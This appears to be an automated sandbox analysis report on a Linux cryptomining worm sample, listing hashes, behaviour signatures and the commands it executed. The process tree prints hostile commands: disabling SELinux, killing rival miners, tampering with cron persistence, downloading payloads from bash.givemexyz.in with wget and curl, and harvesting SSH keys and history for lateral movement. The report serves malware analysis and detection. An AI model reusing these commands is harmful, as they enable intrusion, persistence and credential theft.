Analysis
-
max time kernel
105s -
max time network
106s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
-
submitted
28-03-2024 22:19
General
-
Target
1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
-
Size
11KB
-
MD5
1196d0a31402b04a32aa582ae6d2c15b
-
SHA1
5d6a8c0437bdf30079188283b0e60d063e649f27
-
SHA256
ba2e2bda0794551b0d203c2b617a8b327baa68199e5d7dd22d8849a77fac1183
-
SHA512
cb9e5c0b2a430bd2963b64e659cb2cb65f20d53888e6a188f9831a65c0dd568550439423ff2349c7100e09f45ba3b07e97688c1d9190b2bc1d7a595f310cb28a
-
SSDEEP
192:fQ6PgM8PvaA0Rj1veSS7MYtGRwcY3Pkfz216zPEDAzQSvmgVgIbc1H7vjjB4C1v6:fQ6PgM8PvaA0Rj1vy7fmjwMxzgX17j/s
Malware Config
Signatures
-
Executes dropped EXE 4 IoCs
-
Attempts to change immutable files 5 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
-
Creates/modifies Cron job 1 TTPs 6 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Disables SELinux 9 IoCs
Disables SELinux security module.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads CPU attributes 1 TTPs 19 IoCs
-
Enumerates kernel/hardware configuration 1 TTPs 3 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118/tmp/1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes1181⤵
- Creates/modifies Cron job
-
/usr/sbin/setenforcesetenforce 02⤵
- Disables SELinux
- Reads runtime system information
-
/bin/grepgrep -c processor /proc/cpuinfo2⤵
-
/sbin/sysctlsysctl -w "vm.nr_hugepages=3"2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep :33332⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
/usr/bin/xargsxargs kill -92⤵
-
/sbin/killkill -93⤵
-
/bin/killkill -93⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep :44442⤵
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
- Reads runtime system information
-
/usr/bin/xargsxargs kill -92⤵
-
/sbin/killkill -93⤵
-
/bin/killkill -93⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/grepgrep :55552⤵
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
/usr/bin/xargsxargs kill -92⤵
-
/sbin/killkill -93⤵
-
/bin/killkill -93⤵
- Reads CPU attributes
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/grepgrep :77772⤵
-
/usr/bin/xargsxargs kill -92⤵
-
/sbin/killkill -93⤵
-
/bin/killkill -93⤵
- Reads CPU attributes
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/grepgrep :144442⤵
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
/usr/bin/xargsxargs kill -92⤵
-
/sbin/killkill -93⤵
-
/bin/killkill -93⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/grepgrep :57902⤵
- Disables SELinux
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
/usr/bin/xargsxargs kill -92⤵
-
/sbin/killkill -93⤵
-
/bin/killkill -93⤵
- Reads CPU attributes
-
/bin/grepgrep :457002⤵
- Disables SELinux
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/usr/bin/xargsxargs kill -92⤵
-
/sbin/killkill -93⤵
-
/bin/killkill -93⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
/bin/grepgrep :22222⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/sedsed -e "s/\\/.*//g"2⤵
- Reads runtime system information
-
/usr/bin/xargsxargs kill -92⤵
-
/sbin/killkill -93⤵
-
/bin/killkill -93⤵
- Reads CPU attributes
-
/bin/grepgrep :99992⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
/usr/bin/xargsxargs kill -92⤵
-
/sbin/killkill -93⤵
-
/bin/killkill -93⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/grepgrep :205802⤵
- Disables SELinux
-
/usr/bin/xargsxargs kill -92⤵
-
/sbin/killkill -93⤵
-
/bin/killkill -93⤵
- Reads CPU attributes
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
/usr/bin/xargsxargs kill -92⤵
- Reads runtime system information
-
/sbin/killkill -93⤵
-
/bin/killkill -93⤵
- Reads CPU attributes
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/grepgrep :135312⤵
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/grepgrep 23.94.24.12:80802⤵
- Disables SELinux
-
/usr/bin/xargsxargs kill -92⤵
-
/sbin/killkill -93⤵
-
/bin/killkill -93⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep 134.122.17.13:80802⤵
- Disables SELinux
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
/usr/bin/xargsxargs kill -92⤵
-
/sbin/killkill -93⤵
-
/bin/killkill -93⤵
- Reads CPU attributes
-
/bin/sedsed -e "s/\\/.*//g"2⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/grepgrep 107.189.11.170:4432⤵
-
/usr/bin/xargsxargs kill -92⤵
-
/sbin/killkill -93⤵
-
/bin/killkill -93⤵
- Reads CPU attributes
-
/usr/bin/chattrchattr -i -a /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down2⤵
- Attempts to change immutable files
-
/bin/grepgrep -i "[a]liyun"2⤵
- Attempts to change immutable files
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -i "[y]unjing"2⤵
- Attempts to change immutable files
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/sleepsleep 12⤵
-
/usr/bin/chattrchattr -ai /tmp/dbused2⤵
- Attempts to change immutable files
-
/bin/mkdirmkdir -p /var/spool/cron/crontabs2⤵
-
/bin/mkdirmkdir -p /etc/cron.hourly2⤵
-
/bin/chmodchmod 755 /etc/cron.hourly/oanacroner12⤵
-
/bin/unameuname -m2⤵
-
/usr/bin/wgetwget -q -O - http://bash.givemexyz.in/mips2⤵
-
/bin/chmodchmod +x /tmp/dbused2⤵
-
/bin/chmodchmod +x /tmp/dbused2⤵
-
/tmp/dbused/tmp/dbused -c2⤵
- Executes dropped EXE
-
/tmp/dbused/tmp/dbused -pwn2⤵
- Executes dropped EXE
-
/bin/sleepsleep 52⤵
-
/bin/unameuname -m2⤵
-
/usr/bin/wgetwget -q -O - http://bash.givemexyz.in/bashirc.mips2⤵
-
/bin/chmodchmod +x /tmp/bashirc2⤵
-
/bin/chmodchmod 777 /tmp/bashirc2⤵
-
/tmp/bashirc/tmp/bashirc2⤵
- Executes dropped EXE
-
/bin/systemctlsystemctl is-active cron2⤵
- Enumerates kernel/hardware configuration
-
/bin/systemctlsystemctl is-active crond2⤵
- Enumerates kernel/hardware configuration
-
/bin/systemctlsystemctl is-active atd2⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
-
/usr/bin/whoamiwhoami2⤵
-
/bin/psps auxf2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep cruner2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/usr/bin/xargsxargs kill -92⤵
-
/sbin/killkill -93⤵
-
/bin/killkill -93⤵
- Reads CPU attributes
-
/bin/chmodchmod 777 /var/tmp/cruner2⤵
-
/bin/sleepsleep 152⤵
-
/usr/bin/nohupnohup /var/tmp/cruner2⤵
-
/var/tmp/cruner/var/tmp/cruner2⤵
- Executes dropped EXE
-
/bin/sh/bin/sh /var/tmp/cruner2⤵
-
/bin/sleepsleep 603⤵
- Disables SELinux
-
/bin/bashbash -sh3⤵
-
/bin/bashbash /tmp/xms3⤵
-
/tmp/xms/tmp/xms3⤵
-
/bin/rmrm -rf /tmp3⤵
-
/bin/sleepsleep 603⤵
- Disables SELinux
-
/bin/rmrm -rf /var/tmp/cruner2⤵
-
/bin/grepgrep -q "http://bash.givemexyz.in\\|104.244.75.159"2⤵
-
/usr/bin/crontabcrontab -l2⤵
-
/bin/rmrm -rf /tmp/2start.jpg2⤵
-
/bin/rmrm -rf /tmp/xmi2⤵
-
/usr/bin/chattrchattr +ai -V /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down2⤵
- Attempts to change immutable files
-
/usr/bin/seqseq 0 2551⤵
-
/usr/bin/sortsort -R1⤵
-
/usr/bin/headhead -n11⤵
-
/usr/bin/seqseq 0 2551⤵
-
/usr/bin/sortsort -R1⤵
-
/usr/bin/headhead -n11⤵
-
/sbin/ipip a1⤵
-
/bin/grepgrep "BROADCAST\\|inet"1⤵
-
/bin/grepgrep -oP "inet\\s+\\K\\d{1,3}\\.\\d{1,3}"1⤵
-
/bin/grepgrep -v 1271⤵
-
/bin/grepgrep -v inet61⤵
-
/bin/grepgrep -v 2551⤵
-
/usr/bin/headhead -n11⤵
-
/bin/grepgrep "bytes of data"1⤵
-
/usr/bin/wcwc -l1⤵
-
/bin/pingping -c 1 pool.supportxmr.com1⤵
-
/bin/grepgrep "bytes of data"1⤵
-
/usr/bin/wcwc -l1⤵
-
/bin/pingping -c 1 bash.givemexyz.in1⤵
-
/bin/grepgrep "LISTEN\\|ESTABLISHED\\|TIME_WAIT"1⤵
-
/bin/grepgrep "212.114.52.24:8080\\|194.5.249.24:8080"1⤵
-
/bin/grepgrep -v grep1⤵
-
/bin/grepgrep "212.114.52.24:8080\\|194.5.249.24:8080"1⤵
-
/bin/grepgrep ESTABLISHED1⤵
-
/bin/grepgrep -v grep1⤵
-
/bin/grepgrep ESTABLISHED1⤵
-
/bin/grepgrep 104.168.71.132:801⤵
- Disables SELinux
-
/bin/grepgrep -v grep1⤵
-
/usr/bin/findfind /root/ /root /home -maxdepth 2 -name "id_rsa*"1⤵
-
/bin/grepgrep -vw pub1⤵
-
/bin/grepgrep IdentityFile1⤵
-
/usr/bin/awkawk -F IdentityFile "{print \$2 }"1⤵
-
/bin/catcat /root/.ssh/config "/home/*/.ssh/config" /root/.ssh/config1⤵
-
/usr/bin/uniquniq1⤵
-
/usr/bin/findfind /root/ /root /home -maxdepth 3 -name "*.pem"1⤵
-
/usr/bin/awkawk -F HostName "{print \$2}"1⤵
-
/bin/grepgrep HostName1⤵
-
/bin/catcat /root/.ssh/config "/home/*/.ssh/config" /root/.ssh/config1⤵
-
/bin/grepgrep -oP "([0-9]{1,3}\\.){3}[0-9]{1,3}"1⤵
-
/bin/grepgrep -E "(ssh|scp)"1⤵
-
/bin/catcat /root/.bash_history "/home/*/.bash_history" /root/.bash_history1⤵
-
/bin/grepgrep -oP "([0-9]{1,3}\\.){3}[0-9]{1,3}"1⤵
-
/usr/bin/uniquniq1⤵
-
/bin/catcat "/root/*/.ssh/known_hosts" "/home/*/.ssh/known_hosts" /root/.ssh/known_hosts1⤵
-
/usr/bin/uniquniq1⤵
-
/usr/bin/xargsxargs find1⤵
-
/sbin/findfind2⤵
-
/bin/findfind2⤵
-
/usr/sbin/findfind2⤵
-
/usr/bin/findfind2⤵
- Reads runtime system information
-
/usr/bin/findfind /root/ /root /home -maxdepth 2 -name "\\.ssh"1⤵
-
/usr/bin/awkawk /id_rsa/1⤵
-
/usr/bin/awkawk -F/ "{print \$3}"1⤵
-
/usr/bin/uniquniq1⤵
-
/bin/grepgrep -v "\\.ssh"1⤵
-
/usr/bin/trtr " " "\\n"1⤵
-
/usr/bin/nlnl1⤵
-
/usr/bin/sortsort -u -k21⤵
-
/usr/bin/sortsort -n1⤵
-
/usr/bin/cutcut -f2-1⤵
-
/bin/grepgrep -vw 127.0.0.11⤵
-
/usr/bin/trtr " " "\\n"1⤵
-
/usr/bin/nlnl1⤵
-
/usr/bin/sortsort -u -k21⤵
-
/usr/bin/sortsort -n1⤵
-
/usr/bin/cutcut -f2-1⤵
-
/usr/bin/trtr " " "\\n"1⤵
-
/usr/bin/nlnl1⤵
-
/usr/bin/sortsort -u -k21⤵
-
/usr/bin/sortsort -n1⤵
-
/usr/bin/cutcut -f2-1⤵
-
/usr/bin/curlcurl -fsSL http://bash.givemexyz.in/xms1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
/etc/cron.d/apacheFilesize
284B
MD59e9f6a486d0ea5976184c95a2f52cd49
SHA1e44fe455508309e8e21f9f33fffcc7eecca0de57
SHA2564d63cb713eb9c5f6082e7eb63dd3811d0b6f1e5d35fa3589c201496b222d2337
SHA5121af5c94549c6f06ce522ee026da795226d3566e4868816844e9a6c7e3ffb7edb8b3457ac3cfe5c23f17e21b66e8464c9f79decc866f37e862f5e750307d273b1
-
/etc/cron.d/nginxFilesize
284B
MD569f8fe8920f737d807cfda8f9d2ff2dd
SHA1df11f2d59edac589962a0178e50b6117d18a1933
SHA2565ad7db249a177b46bcb4b5e36ae590fe154b33fec7924bdf61481d281d3c2b8e
SHA512034bd9e34f0deb1d7656ae2c914a304a4efca6920de9d1082a845cdb2ec13c71d46bc0a025a975125169e46c31ac87b7a73f4dc5b8e999e4b24308219f3c2137
-
/etc/cron.d/rootFilesize
284B
MD5ddb2c00af645c486a790ed6d180b8819
SHA14ff1fc702a6d0bbf4cca6be1b2f3ef4d492a9340
SHA2568f05cba82e2eb4ced38eb907928abce67112ebced31d4622428ddadc2d7a1120
SHA5121f29d87c3d78bd42706a7eeedc7557f0d0370436a14cd2279bffa2af58036e1a6350b935b08c8635a9193d3f76e9d76ff3a9c08bfada64ef74f914b3354677a4
-
/etc/cron.hourly/oanacroner1Filesize
264B
MD55cc2369275d33b8007781d1024edca44
SHA13e977f6e183c114affa947b2a2a70f7159ccddcc
SHA2564a123c1f9cb0b49e960603805f087bb73ad26ff72176eba5089ced91823c92fe
SHA51294ecd7e71c2e1edd1b466154aa24f4715d53826e4dafd0fe65123d98f96a08cdd9793dbc5403a47a4a87549eb16c503424e9d799f954c3dc2191d2ac2777ea49
-
/var/spool/cron/crontabs/rootFilesize
277B
MD5e3d993445d42ab3ed35d78335d8ae5a3
SHA1515765b31ed7b7098c12b7baae361fc86f6903ca
SHA2566a1c7caaf79b92073f63e1d84ce8bde50e85bfffe03a7f26d6d1264f685194bd
SHA512006c013726d50d6f1de60c5ff63fcfd881d219f25e66f1011630772443e4a827ff2148cda34eac6f66cb01256edf0f875815bb13836b3b942930cb1be7ca766f
-
/var/spool/cron/rootFilesize
280B
MD53abb4bc980da82bb669c1640539c5316
SHA1be90d689bd325d72f544ab87eed84871a0130f3d
SHA2566b0977f4e9b0023b95cb213ecfd85870db7617cb9db493a6126daf11ace4a71b
SHA512ab1b09cf8751758ca9fc323d6ce21d4bf34267486b96e41d256a9983df23694a73e73c5b5e245a78055471db0f48e4cea4a9e26f8dbf73924fcc4649f59963ff
-
/var/tmp/crunerFilesize
312B
MD5a2ace111ba7b74d185b49324858ea66b
SHA1264073c1cec4e3e0f0e68994e8e9603e2b15af5e
SHA256e83e8403225c0780132b3841c7ee6d09a131076cd60131c082140d5b86dfd044
SHA512d3edd18d880a7fe9226d4ebfddd6d1043041e278f22cd818cd82f9c4457de1a75a08055c6aa8ffbf3793b239d698a010460f84a4492bcee6daa4c50907be9af8
-
memory/994-1-0x56517000-0x565280b0-memory.dmp